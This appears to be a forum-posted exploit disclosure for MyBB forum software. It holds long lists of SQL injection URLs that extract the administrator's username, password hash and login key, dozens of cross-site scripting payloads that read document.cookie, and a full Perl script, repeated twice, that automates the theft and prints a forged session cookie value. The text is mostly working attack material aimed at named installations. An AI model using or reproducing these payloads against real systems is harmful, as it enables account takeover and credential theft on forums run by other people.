Get The Admin username
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,username,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Admin password
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,password,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Loginkey
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
after adding the values click on [Or Select a Buddy:] options on the first one you will find the user name for the admin and in the second will be the password and the third for the loginkey
in showteam.php
user name
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
in usercp.php
user name
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20use
rname,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20us
ername,null%20from%20mybb_users%20where%20uid=1/*
user password
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20pas
sword,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20pa
ssword,null%20from%20mybb_users%20where%20uid=1/*
-----------------------------------------------------
if the forum is closed
global.php?bbclosedwarning=<script>alert(document.cookie);</script>
in index.php
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</scr
ipt>
in calender.php
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=
<script>alert(document.cookie);</script>
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylis
t=<script>alert(document.cookie);</script>
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(d
ocument.cookie);</script>
in editpost.php
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie
);</script>
in forumdisplay.php
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie
);</script>
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.
cookie);</script>
this vulnerabilities works only if the forum were threads forum
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.
cookie);</script>
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie
);</script>
in memberlist.php
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</scrip
t>
in misc.php
misc.php?action=help&GLOBALS[]=1§ions=<script>alert(document.cookie)
;</script>
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.c
ookie);</script>
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cooki
e);</script>
in online.php
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.coo
kie);</script>
in portal.php
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</sc
ript>
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</scrip
t>
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</sc
ript>
#!/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//-------------------------------------------------------------#
use LWP::Simple;
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
if(!$1)
{
$prefix="mybb_";
}
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}
All injections and vulnerabilities discovered by : HACKERS PAL
two days ago i thought to download the new Mybb forum new version files .. and there were the desaster
there is many xss and sql injections in the new protected version ...
and i made a exploit which get the table prefix and give you the admin information and the cookie which you should make value ..
the mods forum is injected with all the vulnerabilities but the main forum and some of od versions are not
url : http://mods.mybboard.com/forum/index.php
0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
SQL injections
in misc.php
Get The Admin username
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,username,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Admin password
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,password,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Loginkey
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
in private.php
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20ui
d,username,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20ui
d,password,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20ui
d,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null%20from%20mybb_users%20where%20uid=1/*
after adding the values click on [Or Select a Buddy:] options on the first one you will find the user name for the admin and in the second will be the password and the third for the loginkey
in showteam.php
user name
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
password
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
loginkey
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
in usercp.php
user name
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20use
rname,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20us
ername,null%20from%20mybb_users%20where%20uid=1/*
user password
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20pas
sword,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20pa
ssword,null%20from%20mybb_users%20where%20uid=1/*
user loginkey
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20log
inkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20lo
ginkey,null%20from%20mybb_users%20where%20uid=1/*
----------------------------------------------------
xss injections
in any file in the forum like forumdisplay.php?fid=1
after the link
add
&"></a><script>alert(document.cookie);</script>&
-----------------------------------------------------
if the forum is closed
global.php?bbclosedwarning=<script>alert(document.cookie);</script>
in index.php
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</scr
ipt>
in calender.php
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=
<script>alert(document.cookie);</script>
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylis
t=<script>alert(document.cookie);</script>
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(d
ocument.cookie);</script>
in editpost.php
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie
);</script>
in forumdisplay.php
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie
);</script>
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.
cookie);</script>
this vulnerabilities works only if the forum were threads forum
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.
cookie);</script>
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie
);</script>
in memberlist.php
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</scrip
t>
in misc.php
misc.php?action=help&GLOBALS[]=1§ions=<script>alert(document.cookie)
;</script>
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.c
ookie);</script>
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cooki
e);</script>
in online.php
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.coo
kie);</script>
in portal.php
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</sc
ript>
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</scrip
t>
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</sc
ript>
in private.php
private.php?GLOBALS[]=1&messagelist=<script>alert(document.cookie);</scr
ipt>
private.php?action=tracking&GLOBALS[]=1&readmessages=<script>alert(docum
ent.cookie);</script>
private.php?action=tracking&GLOBALS[]=1&unreadmessages=<script>alert(doc
ument.cookie);</script>
private.php?action=folders&GLOBALS[]=1&folderlist=<script>alert(document
.cookie);</script>
private.php?action=folders&GLOBALS[]=1&newfolders=<script>alert(document
.cookie);</script>
in showteam.php
showteam.php?GLOBALS[]=1&usergrouprows=<script>alert(document.cookie);</
script>
showteam.php?GLOBALS[]=1&usergroups=<script>alert(document.cookie);</scr
ipt>
in showthread.php
showthread.php?tid=1&GLOBALS[]=1&posts=<script>alert(document.cookie);</
script>
if there is a poll in the thread
showthread.php?tid=1&GLOBALS[]=1&polloptions=<script>alert(document.cook
ie);</script>
in stats.php
stats.php?GLOBALS[]=1&mostreplies=<script>alert(document.cookie);</scrip
t>
in usercp.php
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=<script>alert(document.
cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&returndatesel=<script>alert(docume
nt.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&select=<script>alert(document.cook
ie);</script>
usercp.php?action=profile&GLOBALS[]=1&requiredfields=<script>alert(docum
ent.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&customfields=<script>alert(documen
t.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&langoptions=<script>alert(document
.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&tppoptions=<script>alert(document.
cookie);</script>
usercp.php?action=options&GLOBALS[]=1&pppoptions=<script>alert(document.
cookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&threads=<script>alert(document.c
ookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&folder="><script>alert(document.
cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&threads=<script>alert(docume
nt.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&folder=<script>alert(documen
t.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=<script>a
lert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=<scr
ipt>alert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=<script>alert(do
cument.cookie);</script>
usercp.php?action=avatar&GLOBALS[]=1&galleries=<script>alert(document.co
okie);</script>
usercp.php?action=editlists&GLOBALS[]=1&buddylist=<script>alert(document
.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=<script>alert(documen
t.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&newlist=<script>alert(document.c
ookie);</script>
usercp.php?action=drafts&GLOBALS[]=1&drafts=<script>alert(document.cooki
e);</script>
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=<script>alert(doc
ument.cookie);</script>
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=<script>alert
(document.cookie);</script>
-----------------------------------------
--- The Exploit ---
#!/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//-------------------------------------------------------------#
use LWP::Simple;
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
if(!$1)
{
$prefix="mybb_";
}
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}
# WwW.SoQoR.NeT
[ reply ]